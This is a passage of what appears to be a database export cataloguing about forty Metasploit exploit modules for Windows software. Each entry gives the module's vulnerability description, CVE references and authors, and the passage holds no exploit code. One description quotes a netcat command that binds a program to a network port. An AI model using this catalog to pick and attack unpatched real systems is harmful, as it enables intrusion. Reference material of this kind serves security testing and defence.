00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/eiqnetworks_esa.rb","exploit","windows/misc/eiqnetworks_esa","exploit/windows/misc/eiqnetworks_esa","eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow",200,"This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the LICMGR_ADDLICENSE command, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.","Metasploit Framework License (BSD)","f","2006-07-24 00:00:00",,,"aggressive","t","BID-19163, CVE-2006-3838, OSVDB-27526, URL-http://www.zerodayinitiative.com/advisories/ZDI-06-024.html","MC , kf , ri0t " 945,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb","exploit","windows/misc/eiqnetworks_esa_topology","exploit/windows/misc/eiqnetworks_esa_topology","eIQNetworks ESA Topology DELETEDEVICE Overflow",200,"This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the DELETEDEVICE command in the Topology server, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.","Metasploit Framework License (BSD)","f","2006-07-25 00:00:00",,,"aggressive","t","BID-19164, CVE-2006-3838, OSVDB-27528","MC " 946,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb","exploit","windows/misc/enterasys_netsight_syslog_bof","exploit/windows/misc/enterasys_netsight_syslog_bof","Enterasys NetSight nssyslogd.exe Buffer Overflow",300,"This module exploits a stack buffer overflow in Enterasys NetSight. The vulnerability exists in the Syslog service (nssylogd.exe) when parsing a specially crafted PRIO from a syslog message. The module has been tested successfully on Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2011-12-19 00:00:00",1,,"aggressive","t","BID-51124, CVE-2011-5227, OSVDB-77971, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-350/, URL-https://cp-enterasys.kb.net/article.aspx?article=14206&p=1","Jeremy Brown, juan vazquez , rgod " 947,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/eureka_mail_err.rb","exploit","windows/misc/eureka_mail_err","exploit/windows/misc/eureka_mail_err","Eureka Email 2.2q ERR Remote Buffer Overflow",300,"This module exploits a buffer overflow in the Eureka Email 2.2q client that is triggered through an excessively long ERR message. NOTE: this exploit isn't very reliable. Unfortunately reaching the vulnerable code can only be done when manually checking mail (Ctrl-M). Checking at startup will not reach the code targeted here.","Metasploit Framework License (BSD)","f","2009-10-22 00:00:00",0,,"passive","t","CVE-2009-3837, EDB-10235, OSVDB-59262","Dr_IDE, Francis Provencher (Protek Research Labs), dookie, jduck " 948,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/fb_cnct_group.rb","exploit","windows/misc/fb_cnct_group","exploit/windows/misc/fb_cnct_group","Firebird Relational Database CNCT Group Number Buffer Overflow",300,"This module exploits a vulnerability in Firebird SQL Server. A specially crafted packet can be sent which will overwrite a pointer allowing the attacker to control where data is read from. Shortly, following the controlled read, the pointer is called resulting in code execution. The vulnerability exists with a group number extracted from the CNCT information, which is sent by the client, and whose size is not properly checked. This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phases stackpivot allows to execute the ROP chain which ultimately is used to execute VirtualAlloc and bypass DEP.","Metasploit Framework License (BSD)","t","2013-01-31 00:00:00",0,,"aggressive","t","CVE-2013-2492","Spencer McIntyre" 949,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/fb_isc_attach_database.rb","exploit","windows/misc/fb_isc_attach_database","exploit/windows/misc/fb_isc_attach_database","Firebird Relational Database isc_attach_database() Buffer Overflow",200,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",1,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38607, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 950,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/fb_isc_create_database.rb","exploit","windows/misc/fb_isc_create_database","exploit/windows/misc/fb_isc_create_database","Firebird Relational Database isc_create_database() Buffer Overflow",200,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",1,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38606, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 951,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/fb_svc_attach.rb","exploit","windows/misc/fb_svc_attach","exploit/windows/misc/fb_svc_attach","Firebird Relational Database SVC_attach() Buffer Overflow",200,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",1,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38605, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 952,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/gimp_script_fu.rb","exploit","windows/misc/gimp_script_fu","exploit/windows/misc/gimp_script_fu","GIMP script-fu Server Buffer Overflow",300,"This module exploits a buffer overflow in the script-fu server component on GIMP <= 2.6.12. By sending a specially crafted packet, an attacker may be able to achieve remote code execution under the context of the user. This module has been tested on GIMP for Windows from installers provided by Jernej Simoncic.","Metasploit Framework License (BSD)","t","2012-05-18 00:00:00",0,,"aggressive","t","BID-53741, CVE-2012-2763, EDB-18956, OSVDB-82429, URL-http://www.reactionpenetrationtesting.co.uk/advisories/scriptfu-buffer-overflow-GIMP-2.6.html","Joseph Sheridan, juan vazquez " 953,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb","exploit","windows/misc/hp_dataprotector_dtbclslogin","exploit/windows/misc/hp_dataprotector_dtbclslogin","HP Data Protector DtbClsLogin Buffer Overflow",300,"This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The overflow occurs during the login process, in the DtbClsLogin function provided by the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an insecure way with the username. A successful exploitation will lead to code execution with the privileges of the ""dpwinsdr.exe"" (HP Data Protector Express Domain Server Service) process, which runs as SYSTEM by default.","Metasploit Framework License (BSD)","t","2010-09-09 00:00:00",0,,"aggressive","t","BID-43105, CVE-2010-3007, OSVDB-67973, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-174/","AbdulAziz Hariri, juan vazquez " 954,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb","exploit","windows/misc/hp_dataprotector_new_folder","exploit/windows/misc/hp_dataprotector_new_folder","HP Data Protector Create New Folder Buffer Overflow",300,"This module exploits a stack buffer overflow in HP Data Protector 5. The overflow occurs in the creation of new folders, where the name of the folder is handled in a insecure way by the dpwindtb.dll component. While the overflow occurs in the stack, the folder name is split in fragments in this insecure copy. Because of this, this module uses egg hunting to search a non corrupted copy of the payload in the heap. On the other hand the overflowed buffer is stored in a frame protected by stack cookies, because of this SEH handler overwrite is used. Any user of HP Data Protector Express is able to create new folders and trigger the vulnerability. Moreover, in the default installation the 'Admin' user has an empty password. Successful exploitation will lead to code execution with the privileges of the ""dpwinsdr.exe"" (HP Data Protector Express Domain Server Service) process, which runs as SYSTEM by default.","Metasploit Framework License (BSD)","t","2012-03-12 00:00:00",0,,"aggressive","t","BID-52431, CVE-2012-0124, OSVDB-80105, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03229235, URL-https://community.rapid7.com/community/metasploit/blog/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124","juan vazquez , sinn3r " 955,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_imc_uam.rb","exploit","windows/misc/hp_imc_uam","exploit/windows/misc/hp_imc_uam","HP Intelligent Management Center UAM Buffer Overflow",300,"This module exploits a remote buffer overflow in HP Intelligent Management Center UAM. The vulnerability exists in the uam.exe component, when using sprint in a insecure way for logging purposes. The vulnerability can be triggered by sending a malformed packet to the 1811/UDP port. The module has been successfully tested on HP iMC 5.0 E0101 and UAM 5.0 E0102 over Windows Server 2003 SP2 (DEP bypass).","Metasploit Framework License (BSD)","t","2012-08-29 00:00:00",0,,"aggressive","t","BID-55271, OSVDB-85060, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-171, URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03589863","e6af8de8b1d4b2b6d5ba2610cbf9cd38, juan vazquez , sinn3r " 956,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_magentservice.rb","exploit","windows/misc/hp_magentservice","exploit/windows/misc/hp_magentservice","HP Diagnostics Server magentservice.exe Overflow",200,"This module exploits a stack buffer overflow in HP Diagnostics Server magentservice.exe service. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. Originally found and posted by AbdulAziz Harir via ZDI.","Metasploit Framework License (BSD)","t","2012-01-12 00:00:00",0,,"aggressive","t","CVE-2011-4789, OSVDB-72815, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-016/","AbdulAziz Hariri, hal" 957,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_omniinet_1.rb","exploit","windows/misc/hp_omniinet_1","exploit/windows/misc/hp_omniinet_1","HP OmniInet.exe MSG_PROTOCOL Buffer Overflow",500,"This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only exploits the first one.","Metasploit Framework License (BSD)","t","2009-12-17 00:00:00",0,,"aggressive","t","BID-37396, CVE-2007-2280, OSVDB-61206, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-099","EgiX , Fairuzan Roslan , jduck " 958,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_omniinet_2.rb","exploit","windows/misc/hp_omniinet_2","exploit/windows/misc/hp_omniinet_2","HP OmniInet.exe MSG_PROTOCOL Buffer Overflow",500,"This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only exploits the second one.","Metasploit Framework License (BSD)","t","2009-12-17 00:00:00",0,,"aggressive","t","BID-37250, CVE-2009-3844, OSVDB-60852, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-091","EgiX , Fairuzan Roslan , jduck " 959,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_omniinet_3.rb","exploit","windows/misc/hp_omniinet_3","exploit/windows/misc/hp_omniinet_3","HP OmniInet.exe Opcode 27 Buffer Overflow",500,"This module exploits a buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted opcode 27 packet, a remote attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2011-06-29 00:00:00",0,,"aggressive","t","CVE-2011-1865, OSVDB-73571, URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities","MC " 960,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_omniinet_4.rb","exploit","windows/misc/hp_omniinet_4","exploit/windows/misc/hp_omniinet_4","HP OmniInet.exe Opcode 20 Buffer Overflow",400,"This module exploits a vulnerability found in HP Data Protector's OmniInet process. By supplying a long string of data as the file path with opcode '20', a buffer overflow can occur when this data is being written on the stack where no proper bounds checking is done beforehand, which results arbitrary code execution under the context of SYSTEM. This module is also made against systems such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR enabled by default.","Metasploit Framework License (BSD)","f","2011-06-29 00:00:00",0,,"aggressive","t","CVE-2011-1865, EDB-17468, OSVDB-73571, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182, URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities","Oren Isacson, corelanc0d3r , dookie, muts, sinn3r " 961,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb","exploit","windows/misc/hp_operations_agent_coda_34","exploit/windows/misc/hp_operations_agent_coda_34","HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow",300,"This module exploits a buffer overflow vulnerability in HP Operations Agent for Windows. The vulnerability exists in the HP Software Performance Core Program component (coda.exe) when parsing requests for the 0x34 opcode. This module has been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass). The coda.exe components runs only for localhost by default, network access must be granted through its configuration to be remotely exploitable. On the other hand it runs on a random TCP port, to make easier reconnaissance a check function is provided.","Metasploit Framework License (BSD)","t","2012-07-09 00:00:00",1,,"aggressive","t","BID-54362, CVE-2012-2019, OSVDB-83673, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-114/","Luigi Auriemma, juan vazquez " 962,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb","exploit","windows/misc/hp_operations_agent_coda_8c","exploit/windows/misc/hp_operations_agent_coda_8c","HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow",300,"This module exploits a buffer overflow vulnerability in HP Operations Agent for Windows. The vulnerability exists in the HP Software Performance Core Program component (coda.exe) when parsing requests for the 0x8c opcode. This module has been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass). The coda.exe components runs only for localhost by default, network access must be granted through its configuration to be remotely exploitable. On the other hand it runs on a random TCP port, to make easier reconnaissance a check function is provided.","Metasploit Framework License (BSD)","t","2012-07-09 00:00:00",1,,"aggressive","t","BID-54362, CVE-2012-2020, OSVDB-83674, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-115/","Luigi Auriemma, juan vazquez " 963,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_ovtrace.rb","exploit","windows/misc/hp_ovtrace","exploit/windows/misc/hp_ovtrace","HP OpenView Operations OVTrace Buffer Overflow",200,"This module exploits a stack buffer overflow in HP OpenView Operations version A.07.50. By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-08-09 00:00:00",0,,"aggressive","t","BID-25255, CVE-2007-3872, OSVDB-39527","MC " 964,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ib_isc_attach_database.rb","exploit","windows/misc/ib_isc_attach_database","exploit/windows/misc/ib_isc_attach_database","Borland InterBase isc_attach_database() Buffer Overflow",400,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",0,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38607, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 965,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ib_isc_create_database.rb","exploit","windows/misc/ib_isc_create_database","exploit/windows/misc/ib_isc_create_database","Borland InterBase isc_create_database() Buffer Overflow",400,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",0,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38606, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 966,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ib_svc_attach.rb","exploit","windows/misc/ib_svc_attach","exploit/windows/misc/ib_svc_attach","Borland InterBase SVC_attach() Buffer Overflow",400,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",0,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38605, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 967,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb","exploit","windows/misc/ibm_cognos_tm1admsd_bof","exploit/windows/misc/ibm_cognos_tm1admsd_bof","IBM Cognos tm1admsd.exe Overflow",300,"This module exploits a stack buffer overflow in IBM Cognos Analytic Server Admin service. The vulnerability exists in the tm1admsd.exe component, due to a dangerous copy of user controlled data to the stack, via memcpy, without validating the supplied length and data. The module has been tested successfully on IBM Cognos Express 9.5 over Windows XP SP3.","Metasploit Framework License (BSD)","t","2012-04-02 00:00:00",0,,"aggressive","t","BID-52847, CVE-2012-0202, OSVDB-80876, URL-http://www-01.ibm.com/support/docview.wss?uid=swg21590314, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-101/","Unknown, juan vazquez " 968,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb","exploit","windows/misc/ibm_director_cim_dllinject","exploit/windows/misc/ibm_director_cim_dllinject","IBM System Director Agent DLL Injection",600,"This module abuses the ""wmicimsv"" service on IBM System Director Agent 5.20.3 to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM privileges. In order to accomplish remote DLL injection it uses a WebDAV service as disclosed by kingcope on December 2012. Because of this, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. It is enabled and automatically started by default on Windows XP SP3, but disabled by default on Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2009-03-10 00:00:00",0,,"passive","t","BID-34065, CVE-2009-0880, OSVDB-52616, OSVDB-88102, URL-http://seclists.org/bugtraq/2012/Dec/5, URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20090305-2_IBM_director_privilege_escalation.txt","Bernhard Mueller, juan vazquez , kingcope" 969,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb","exploit","windows/misc/ibm_tsm_cad_ping","exploit/windows/misc/ibm_tsm_cad_ping","IBM Tivoli Storage Manager Express CAD Service Buffer Overflow",400,"This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service. By sending a ""ping"" packet containing a long string, an attacker can execute arbitrary code. NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order for the vulnerable code to be reached. This state doesn't appear to be reachable when the TSM server is not running. This service does not restart.","Metasploit Framework License (BSD)","t","2009-11-04 00:00:00",0,,"aggressive","t","CVE-2009-3853, OSVDB-59632","jduck " 970,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb","exploit","windows/misc/ibm_tsm_rca_dicugetidentify","exploit/windows/misc/ibm_tsm_rca_dicugetidentify","IBM Tivoli Storage Manager Express RCA Service Buffer Overflow",500,"This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express Remote Client Agent service. By sending a ""dicuGetIdentify"" request packet containing a long NodeName parameter, an attacker can execute arbitrary code. NOTE: this exploit first connects to the CAD service to start the RCA service and obtain the port number on which it runs. This service does not restart.","Metasploit Framework License (BSD)","t","2009-11-04 00:00:00",0,,"aggressive","t","BID-34803, CVE-2008-4828, OSVDB-54232","jduck " 971,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/itunes_extm3u_bof.rb","exploit","windows/misc/itunes_extm3u_bof","exploit/windows/misc/itunes_extm3u_bof","Apple iTunes 10 Extended M3U Stack Buffer Overflow",300,"This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7. When opening an extended .m3u file containing an ""#EXTINF:"" tag description, iTunes will copy the content after ""#EXTINF:"" without appropriate checking from a heap buffer to a stack buffer, writing beyond the stack buffer's boundary, which allows code execution under the context of the user. Please note before using this exploit, you must have precise knowledge of the victim machine's QuickTime version (if installed), and then select your target accordingly. In addition, even though this exploit can be used as remote, you should be aware the victim's browser behavior when opening an itms link. For example, IE/Firefox/Opera by default will ask the user for permission before launching the itms link by iTunes. Chrome will ask for permission, but also spits a warning. Safari would be an ideal target, because it will open the link without any user interaction.","Metasploit Framework License (BSD)","f","2012-06-21 00:00:00",,,"passive","t","EDB-19322, OSVDB-83220, URL-http://pastehtml.com/view/c25uhk4ab.html","Rh0 , sinn3r " 972,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/landesk_aolnsrvr.rb","exploit","windows/misc/landesk_aolnsrvr","exploit/windows/misc/landesk_aolnsrvr","LANDesk Management Suite 8.7 Alert Service Buffer Overflow",200,"This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending an overly long string to the Alert Service, a buffer is overwritten and arbitrary code can be executed.","Metasploit Framework License (BSD)","t","2007-04-13 00:00:00",0,,"aggressive","t","CVE-2007-1674, OSVDB-34964, URL-http://www.tippingpoint.com/security/advisories/TSRT-07-04.html","MC " 973,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/mercury_phonebook.rb","exploit","windows/misc/mercury_phonebook","exploit/windows/misc/mercury_phonebook","Mercury/32 <= v4.01b PH Server Module Buffer Overflow",200,"This module exploits a stack-based buffer overflow in Mercury/32 <= v4.01b PH Server Module. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer.","Metasploit Framework License (BSD)","t","2005-12-19 00:00:00",0,,"aggressive","t","BID-16396, CVE-2005-4411, OSVDB-22103","MC " 974,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/mini_stream.rb","exploit","windows/misc/mini_stream","exploit/windows/misc/mini_stream","Mini-Stream 3.0.1.1 Buffer Overflow",300,"This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1 By creating a specially crafted pls file, an an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-12-25 00:00:00",0,,"passive","t","CVE-2009-5109, EDB-10745, OSVDB-61341","CORELAN Security Team, Ron Henry " 975,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/mirc_privmsg_server.rb","exploit","windows/misc/mirc_privmsg_server","exploit/windows/misc/mirc_privmsg_server","mIRC <= 6.34 PRIVMSG Handling Stack Buffer Overflow",300,"This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier. By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads may be necessary. This module is based on the code by SkD.","Metasploit Framework License (BSD)","f","2008-10-02 00:00:00",0,,"passive","t","BID-31552, CVE-2008-4449, EDB-6666, OSVDB-48752","patrick " 976,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ms07_064_sami.rb","exploit","windows/misc/ms07_064_sami","exploit/windows/misc/ms07_064_sami","Microsoft DirectX DirectShow SAMI Buffer Overflow",300,"This module exploits a stack buffer overflow in the DirectShow Synchronized Accessible Media Interchanged (SAMI) parser in quartz.dll. This module has only been tested with Windows Media Player (6.4.09.1129) and DirectX 8.0.","Metasploit Framework License (BSD)","f","2007-12-11 00:00:00",0,,"passive","t","BID-26789, CVE-2007-3901, MSB-MS07-064, OSVDB-39126","MC " 977,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ms10_104_sharepoint.rb","exploit","windows/misc/ms10_104_sharepoint","exploit/windows/misc/ms10_104_sharepoint","Microsoft Office SharePoint Server 2007 Remote Code Execution",600,"This module exploits a vulnerability found in SharePoint Server 2007 SP2. The software contains a directory traversal, that allows a remote attacker to write arbitrary files to the filesystem, sending a specially crafted SOAP ConvertFile request to the Office Document Conversions Launcher Service, which results in code execution under the context of 'SYSTEM'. The module uses uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of SharePoint on Windows 2003 Servers. It has been successfully tested on Office SharePoint Server 2007 SP2 over Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2010-12-14 00:00:00",0,,"aggressive","t","BID-45264, CVE-2010-3964, MSB-MS10-104, OSVDB-69817, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-287/","James Burton, Oleksandr Mirosh, juan vazquez " 978,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/netcat110_nt.rb","exploit","windows/misc/netcat110_nt","exploit/windows/misc/netcat110_nt","Netcat v1.10 NT Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in Netcat v1.10 NT. By sending an overly long string we are able to overwrite SEH. The vulnerability exists when netcat is used to bind (-e) an executable to a port in doexec.c. This module tested successfully using ""c:\>nc -L -p 31337 -e ftp"".","Metasploit Framework License (BSD)","f","2004-12-27 00:00:00",0,,"aggressive","t","BID-12106, CVE-2004-1317, EDB-726, OSVDB-12612","patrick " 979,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/nettransport.rb","exploit","windows/misc/nettransport","exploit/windows/misc/nettransport","NetTransport Download Manager 2.90.510 Buffer Overflow",300,"This exploits a stack buffer overflow in NetTransport Download Manager, part of the NetXfer suite. This module was tested successfully against version 2.90.510.","Metasploit Framework License (BSD)","f","2010-01-02 00:00:00",0,,"aggressive","t","EDB-10911, OSVDB-61435","Lincoln, dookie" 980,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/poisonivy_bof.rb","exploit","windows/misc/poisonivy_bof","exploit/windows/misc/poisonivy_bof","Poison Ivy 2.3.2 C&C Server Buffer Overflow",300,"This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server. The exploit does not need to know the password chosen for the bot/server communication. If the C&C is configured with the default 'admin' password, the exploit should work fine. In case of the C&C configured with another password the exploit can fail. The 'check' command can be used to determine if the C&C target is using the default 'admin' password. Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread responsible of handling the connection. Because of this the module provides the RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header will be used. If the bruteforce target is selected, a random header will be sent in case the default for the password 'admin' doesn't work. Bruteforce will stop after 5 tries or a session obtained.","Metasploit Framework License (BSD)","f","2012-06-24 00:00:00",0,,"aggressive","t","URL-http://badishi.com/own-and-you-shall-be-owned, URL-http://www.signal11.eu/en/research/articles/targeted_2010.pdf","Andrzej Dereszowski, Gal Badishi, juan vazquez " 981,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/poppeeper_date.rb","exploit","windows/misc/poppeeper_date","exploit/windows/misc/poppeeper_date","POP Peeper v3.4 DATE Buffer Overflow",300,"This module exploits a stack buffer overflow in POP Peeper v3.4. When a specially crafted DATE string is sent to a client, an attacker may be able to execute arbitrary code. This module is based off of krakowlabs code.","Metasploit Framework License (BSD)","f","2009-02-27 00:00:00",0,,"passive","t","BID-34093, CVE-2009-1029, OSVDB-53560, URL-http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_date-bof.txt","MC " 982,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/poppeeper_uidl.rb","exploit","windows/misc/poppeeper_uidl","exploit/windows/misc/poppeeper_uidl","POP Peeper v3.4 UIDL Buffer Overflow",300,"This module exploits a stack buffer overflow in POP Peeper v3.4. When a specially crafted UIDL string is sent to a client, an attacker may be able to execute arbitrary code. This module is based off of krakowlabs code.","Metasploit Framework License (BSD)","f","2009-02-27 00:00:00",0,,"passive","t","BID-33926, CVE-2009-1029, OSVDB-53559, URL-http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_uidl-bof.txt","MC " 983,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/pxexploit.rb","exploit","windows/misc/pxexploit","exploit/windows/misc/pxexploit","PXE Exploit Server",600,"This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive; placing the payload on the hard drive of any Windows partition seen. Note: the displayed IP address of a target is the address this DHCP server handed out, not the ""normal"" IP address the host uses.","Metasploit Framework License (BSD)","t","2011-08-05 00:00:00",0,,"passive","t",,"scriptjunkie" 984,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/realtek_playlist.rb","exploit","windows/misc/realtek_playlist","exploit/windows/misc/realtek_playlist","Realtek Media Player Playlist Buffer Overflow",500,"This module exploits a stack buffer overflow in Realtek Media Player(RtlRack) A4.06. When a Realtek Media Player client opens a specially crafted playlist, an attacker may be able to execute arbitrary code.","Metasploit Framework 